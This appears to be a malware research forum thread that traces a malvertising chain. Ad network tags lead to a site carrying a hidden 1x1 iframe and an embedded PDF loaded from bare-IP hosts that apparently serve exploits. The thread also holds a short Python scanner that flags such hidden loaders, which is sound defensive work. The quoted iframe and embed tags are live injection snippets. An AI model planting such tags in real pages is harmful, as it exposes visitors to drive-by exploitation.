Full Version: 85.17.169.57/85.17.166.209
B.I.S.S. Forums > Malware Research Forum > Malware IP Research Section
wagdoll
The site hxxp://gamers-games.com has been carrying malware since at least the 20th December. This site is running in several ad network inventories as "prepopped" ads. The malware is loading via a 1x1 iframe at the bottom of that site, and the domains serving the malware in that iframe are actively changing... I searched this forum for the IP addresses that are hosting the malware files, but the closest matches I could find were 85.17.16*

The publishing site URL that is seen in the code is referrer-dependent; if you try to load it in a blank window it will redirect to a cleaner page.

20th December hxxp://gamers-games.com was carrying this:
CODE
<iframe height="1" width="1" src="http://85.17.166.209/css/index.php?sid=2613261e2e162f1d2f1e235022472a4b2c112617221324151e" style="outline-color: -moz-use-text-color; outline-style: none; outline-width: medium;">


That loaded:

CODE
<embed height="100" width="100" type="application/pdf" src="http://85.17.166.209/css/pdf.php?id=0&sid=2613261e2e162f1d2f1e235022472a4b2c112617221324151e" style="outline-color: -moz-use-text-color; outline-style: none; outline-width: medium;"/>


Today, coming via a slightly different ad network:

This one shows the ad networks because it's the second time in as many days I've had a malware-type problem from antventure...

CODE
<!-- BEGIN STANDARD TAG - prepopped - foloo.net: Run-of-site - DO NOT MODIFY -->

<script src="http://ad.spot200.com/st?ad_type=pop&ad_size=0x0&section=420420&banned_pop_types=23&pop_times=1&pop_frequency=0" type="text/javascript">

<script src="http://ad.yieldmanager.com/imp?Z=0x0&y=23&s=420420&_salt=1123623717&B=10&r=0" type="text/javascript">

<iframe id="rm_frm" height="100%" frameborder="0" width="100%" name="rm_frm" marginheight="0" marginwidth="0" src="http://ad.spot200.com/iframe3?T51aAERqBgCK.RcAxrkHAAIAAAAAAP8AAAAECQIIAANEAAkAQpoJALUlCwAAAAAAAAAAAAAAAAAAAAAA
AAAAAB0LG6-KgeE.HQsbr4qB4T-GEi15PC3tP4YSLXk8Le0.ZmZmZmZm.j9mZmZmZmb-PwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAVbIVEf4PpAX.cL.L9ceATagfwR56GjWGiR5F
HAAAAAA=,,http://foloo.net/pages/ptp.php?refid=ynot">


That loads:
CODE
<!-- BEGIN STANDARD TAG - prepopped - ROS: Run-of-site - DO NOT MODIFY -->
<script src="http://ad.antventure.com/st?ad_type=pop&ad_size=0x0&section=477339&banned_pop_types=23&pop_times=1&pop_frequency=0" type="text/javascript">
</script>
<script src="http://ad.yieldmanager.com/imp?Z=0x0&y=23&s=477339&_salt=3755613422&B=10&r=0" type="text/javascript">
</script>
<iframe id="rm_frm" height="100%" frameborder="0" width="100%" name="rm_frm" marginheight="0" marginwidth="0" src="http://ad.antventure.com/iframe3? AAAAAJtIBwD8WRgArd8HAAIAWAAAAP8AAAAECQIIAAPwJAsAcpwJANFcCwAAAAAAAAAAAAAAAAAAAAAA
AAAAADMzMzMzM.M. MzMzMzMz8z8zMzMzMzMDQDMzMzMzMwNAAAAAAAAAEEAAAAAAAAAQQAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAXoJneBAQpAUaz56Ehmf3V1IwZ45rBUorbL5HTQAAAAA=,,http://www.antventure.com/creatives/default/mke/popad.html">


That loads:
CODE
hxxp://gamers-games.com


That has this iframe at the bottom:
CODE
<iframe height="1" width="1" src="http://85.17.169.57/css/index.php?sid=b181b687b681b182b081bccfbdd8b5d4b38eb988bd8cbb8a84">


That loads:
CODE
http://85.17.169.57/css/pdf.php?id=0&sid=b181b687b681b182b081bccfbdd8b5d4b38eb988bd8cbb8a84
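One defensive check a practitioner might run over captured page source to catch the pattern described in this post: a scanner that parses HTML and flags 1x1 iframes, hidden-style embeds, bare-IP hosts and embedded PDF objects. This is an added example, not code from the forum post or the thread's participants; the fragments quoted above are reused as constructed sample input, and the function and class names are my own.

```python
"""Flag hidden iframes and embedded PDF objects that point at bare-IP hosts.

Added example for this thread (not from the forum post). Uses only the
standard library so it runs offline over saved page source.
"""
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: the hidden iframe and embed fragments quoted in the post,
# plus one ordinary iframe that should NOT be flagged.
SAMPLE_HTML = """
<p>page content</p>
<iframe height="1" width="1" src="http://85.17.166.209/css/index.php?sid=2613261e2e162f1d2f1e235022472a4b2c112617221324151e"></iframe>
<embed height="100" width="100" type="application/pdf" src="http://85.17.166.209/css/pdf.php?id=0&sid=2613261e2e162f1d2f1e235022472a4b2c112617221324151e"/>
<iframe height="300" width="300" src="https://www.example.com/video"></iframe>
"""

# Pixel sizes that make an iframe effectively invisible to the visitor.
TINY_SIZES = {"0", "1"}


def is_ip_literal(netloc):
    """True when the host part of a URL is a bare IPv4/IPv6 address, not a name."""
    host = netloc.split(":")[0].strip("[]")
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


class HiddenLoaderScanner(HTMLParser):
    """Collects iframe/embed/object tags that look like covert exploit loaders."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag not in ("iframe", "embed", "object"):
            return
        a = dict(attrs)
        src = a.get("src") or a.get("data") or ""
        if not src:
            return
        reasons = []

        # 1x1 / 0x0 iframes: content loads but the visitor never sees it.
        width = (a.get("width") or "").strip().rstrip("px")
        height = (a.get("height") or "").strip().rstrip("px")
        if tag == "iframe" and width in TINY_SIZES and height in TINY_SIZES:
            reasons.append("tiny-iframe")

        # Inline styles that hide the element outright.
        style = (a.get("style") or "").replace(" ", "").lower()
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("hidden-style")

        # Legitimate ad/media hosts almost always use hostnames, not raw IPs.
        parsed = urlparse(src)
        if is_ip_literal(parsed.netloc):
            reasons.append("ip-literal-host")

        # PDF objects loaded from a script endpoint are a classic exploit carrier.
        mime = (a.get("type") or "").lower()
        if mime == "application/pdf" or parsed.path.lower().endswith(".pdf"):
            reasons.append("pdf-object")

        if reasons:
            self.findings.append({"tag": tag, "src": src, "reasons": reasons})


def scan_html(html):
    """Return a list of findings, each {'tag', 'src', 'reasons'}, in document order."""
    parser = HiddenLoaderScanner()
    parser.feed(html)
    parser.close()
    return parser.findings


def defang(url):
    """Render a URL non-clickable for reports, the way the post writes hxxp://."""
    return url.replace("https://", "hxxps://").replace("http://", "hxxp://")


if __name__ == "__main__":
    for finding in scan_html(SAMPLE_HTML):
        print(finding["tag"], defang(finding["src"]), ",".join(finding["reasons"]))
```

Run against saved page source from a proxy capture; anything tagged `tiny-iframe` together with `ip-literal-host` is worth pulling the referenced URL for analysis in a sandbox, and `pdf-object` hits from a `.php` endpoint are the pattern this thread is about.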
Kimberly
Yeah wagdoll, I've been aware of the problem since December 24. It's coming through Yahoo and splattered everywhere. I did alert them about the issue. Being holidays, most of my contacts are out of office unfortunately.

It's not only a PDF exploit but around 10 different ones.
Moore
Thanks for your help wagdoll. Added those IPs.
Kimberly
There is some more ...
http://www.bluetack.co.uk/forums/index.php...ost&p=90556

ads.bootcampmedia.com is AdJuggler... which means I know exactly who to contact.